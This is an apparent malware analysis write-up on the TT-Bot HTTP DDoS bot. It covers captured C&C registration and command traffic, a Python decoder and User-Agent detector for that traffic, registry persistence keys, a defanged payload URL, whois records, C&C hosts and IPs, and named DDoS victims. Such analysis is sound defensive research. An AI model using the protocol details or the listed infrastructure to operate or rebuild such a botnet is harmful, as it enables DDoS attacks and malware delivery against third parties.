TT-Bot DDoS Bot Analysis

We recently spotted this family in our malware zoo: another HTTP DDoS bot. Its identifying mark is the string “User-Agent: TT-Bot 1.0.0” in the client requests. We do not know whether this is a kit; this particular one appears to be in limited use. We have not explored the server side of it.

HTTP communications happen in two stages. The first stage is registration, where the bot gets its ID:

POST /register.php HTTP/1.1
Host: panel.ntpupdatedomain.com
User-Agent: TT-Bot 1.0.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
ccode=US&nat=1&os=5.1&owner=1&pcname=[Hostname]&username=[Username]&version=100

The server replies with an ID:

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 18 Mar 2010 02:30:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: PHPSESSID=170b66d3e291e99e27f5441b2b5d935a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
28
<R><id>3961</id></R><I><c>45</c></I>
0

This ID is then used to fetch the current command from the C&C by calling a server-side script:

POST [REMOVED] HTTP/1.1
Host: panel.ntpupdatedomain.com
User-Agent: TT-Bot 1.0.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
id=3961

The server replies with a command, which can include new EXEs to download and launch or victims to DDoS:

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 18 Mar 2010 02:30:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Set-Cookie: PHPSESSID=c88dea160e6476d2c312d1b2e27ca4d1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
68
<C><id>487</id><m>4</m><c>3</c><p0>www.dollaropoker.com</p0><p1>80</p1><p2>9</p2></C><I><c>60</c></I>
0

In this case the bot is told to DDoS (HTTP flood) www.dollaropoker.com.
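Decoding the exchange above, as an added example that is not part of the original post and not code taken from the bot: the script below identifies TT-Bot requests by their User-Agent, extracts what the bot leaks at registration, de-chunks the server reply and pulls the bot ID or the command parameters out of the XML-like body. The sample messages are constructed from the captures shown (pcname and username are placeholders, and the command URL stays redacted as in the post). Reading <p0>/<p1> as flood target and port, and <I><c> as a poll interval in seconds, are assumptions of this example; <m>, <c> and <p2> are passed through untouched because the post does not explain them.

```python
"""Decoder for the TT-Bot check-in exchange (added example, not the bot's code)."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs

TT_BOT_UA = "TT-Bot 1.0.0"


def chunked(body: bytes) -> bytes:
    """Wrap a body in one HTTP/1.1 chunk; used only to build the samples below."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body)


# Constructed samples modelled on the captures in the post. Hostname and IDs are
# the ones shown; pcname/username are placeholders; the command path is redacted.
REGISTER_REQUEST = (
    b"POST /register.php HTTP/1.1\r\n"
    b"Host: panel.ntpupdatedomain.com\r\n"
    b"User-Agent: TT-Bot 1.0.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"ccode=US&nat=1&os=5.1&owner=1&pcname=LAB-PC&username=lab&version=100"
)
REGISTER_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\n\r\n"
    + chunked(b"<R><id>3961</id></R><I><c>45</c></I>")
)
COMMAND_REQUEST = (
    b"POST /[REMOVED] HTTP/1.1\r\nHost: panel.ntpupdatedomain.com\r\n"
    b"User-Agent: TT-Bot 1.0.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n\r\nid=3961"
)
COMMAND_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\n\r\n"
    + chunked(b"<C><id>487</id><m>4</m><c>3</c><p0>www.dollaropoker.com</p0>"
              b"<p1>80</p1><p2>9</p2></C><I><c>60</c></I>")
)


def split_http(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into start line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_ttbot_request(raw: bytes) -> bool:
    """Network detection: a POST carrying the bot's fixed User-Agent string."""
    start, headers, _ = split_http(raw)
    return start.startswith("POST ") and headers.get("user-agent") == TT_BOT_UA


def parse_registration(raw: bytes) -> Dict[str, str]:
    """Fields the bot leaks at registration (country, OS, hostname, username...)."""
    _, _, body = split_http(raw)
    return {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body (chunk extensions are ignored)."""
    out, pos = bytearray(), 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)
        pos = nl + 2
        if size == 0:
            return bytes(out)
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("malformed chunk")
        out += body[pos:pos + size]
        pos += size + 2


@dataclass
class Checkin:
    kind: str                       # "register" or "command"
    bot_id: Optional[int] = None    # <R><id>, assigned at registration
    cmd_id: Optional[int] = None    # <C><id>
    params: Dict[str, str] = field(default_factory=dict)  # <m>, <c>, <p0>... verbatim
    interval: Optional[int] = None  # <I><c>; assumed to be the next poll delay in seconds


def parse_response(raw: bytes) -> Checkin:
    """Turn a C&C reply into a Checkin; raises if neither <R> nor <C> is present."""
    _, headers, body = split_http(raw)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    root = ET.fromstring(b"<x>" + body + b"</x>")   # body has several top-level elements
    itext = root.findtext("I/c")
    interval = int(itext) if itext is not None else None
    reg = root.find("R")
    if reg is not None:
        return Checkin("register", bot_id=int(reg.findtext("id")), interval=interval)
    cmd = root.find("C")
    if cmd is not None:
        params = {e.tag: (e.text or "") for e in cmd if e.tag != "id"}
        return Checkin("command", cmd_id=int(cmd.findtext("id")), params=params, interval=interval)
    raise ValueError("no <R> or <C> element in TT-Bot response")


def flood_target(c: Checkin) -> Optional[Tuple[str, int]]:
    """(host, port) for a command carrying <p0>/<p1>; None for anything else."""
    if c.kind == "command" and "p0" in c.params and c.params.get("p1", "").isdigit():
        return c.params["p0"], int(c.params["p1"])
    return None


if __name__ == "__main__":
    for req, resp in ((REGISTER_REQUEST, REGISTER_RESPONSE), (COMMAND_REQUEST, COMMAND_RESPONSE)):
        print("TT-Bot request:", is_ttbot_request(req))
        c = parse_response(resp)
        print(c, "target:", flood_target(c))
```

The User-Agent match is the cheap network indicator; the body decoder is what lets you pull targets out of a capture without re-implementing the bot. Note that the same bot ID is reused on every poll, so a long-lived capture from one host will show one ID and a series of command IDs.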

Static analysis suggests that the code is written in MS VB 6. On the host the following filesystem modifications occur:

drops and then deletes:
C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
drops and then deletes:
C:\Documents and Settings\[Username]\Application Data\svchost.exe

It wouldn’t be a bot without some registry sets:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Systemhost:
C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
HKEY_CURRENT_USER\Console\FL_Steam:
[REG_DWORD, value: 00000001]
HKEY_CURRENT_USER\Console\ID:
[REG_DWORD, value: 000000E1]
HKEY_CURRENT_USER\Console\SECSERVER:
connect.tt-bot.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Systemhost:
C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
HKEY_CURRENT_USER\Console\ID:
[REG_DWORD, value: 00000022]
HKEY_CURRENT_USER\Console\SECSERVER:
p.tt-bot.com

Victims that we have seen DDoSed so far by this botnet:

    http://www.hydrodreams.ch/
    http://www.dollaropoker.com/

The attacker has also told the bots (in the past) to download:

    hxxp://[REMOVED].funpic.de/v52.exe

Two of the domains associated with the botnet are privacy protected but look questionable on inspection. The domain names ttbot.net, tt-bot.com and tt-bot.ru have been used (seen in registry keys and in DNS):

[whois.PublicDomainRegistry.com]
Registration Service Provider:
LovingName.com - E-Gold Domain Registration
Accept Liberty Reserve, e-Bullion, E-Gold, PayPal, MoneyBookers, WebMoney, Pecunix
.
Domain Name: TT-BOT.COM
.
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
.
Creation Date: 03-Oct-2009
Expiration Date: 03-Oct-2010
.
Domain servers in listed order:
ns2.2x4hosting.ru
ns1.2x4hosting.ru


Domain Name: ttbot.net
Registrar: Name.com LLC
.
Protected Domain Services Customer ID: NCR-1191739
.
Expiration Date: 2010-11-19 12:50:35
Creation Date: 2009-11-19 12:50:35
.
Name Servers:
NS1.NAME.COM
NS2.NAME.COM
NS3.NAME.COM
NS4.NAME.COM
.
REGISTRANT CONTACT INFO
Protected Domain Services - Customer ID: NCR-1191739
125 Rampart Way
Suite 300
Denver
CO
80230
US
Phone: +1.7202492374
Email Address: ttbot.net@protecteddomainservices.com


[whois.ripn.net]
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
.
domain: TT-BOT.RU
nserver: ns1.everydns.net.
nserver: ns2.everydns.net.
nserver: ns3.everydns.net.
nserver: ns4.everydns.net.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 4957564482
e-mail: mail@sunfighter.us
registrar: REGTIME-REG-RIPN
created: 2009.10.07
paid-till: 2010.10.07
source: TCI
.
Last updated on 2010.03.18 16:24:00 MSK/MSD

Known C&C servers for this botnet include connect.tt-bot.com:

connect.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks

and panel.ntpupdatedomain.com

panel.ntpupdatedomain.com. 800 IN A 92.241.165.161
AS | IP | AS Name
41947 | 92.241.165.161 | WEBALTA-AS Wahome networks

Hostnames referenced in the bot’s registry include:

panel.tt-bot.ru is an alias for panel.vps100.tt-bot.ru.
panel.vps100.tt-bot.ru is an alias for vps100.ttbot.net.
vps100.ttbot.net has address 217.23.5.100


connect.tt-bot.com has address 92.241.169.250
p.tt-bot.com has address 92.241.169.250
.
AS | IP | AS Name
49981 | 217.23.5.100 | WORLDSTREAM WorldStream
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks

At this time this botnet is still live and issuing commands. We do not know how big this botnet is.
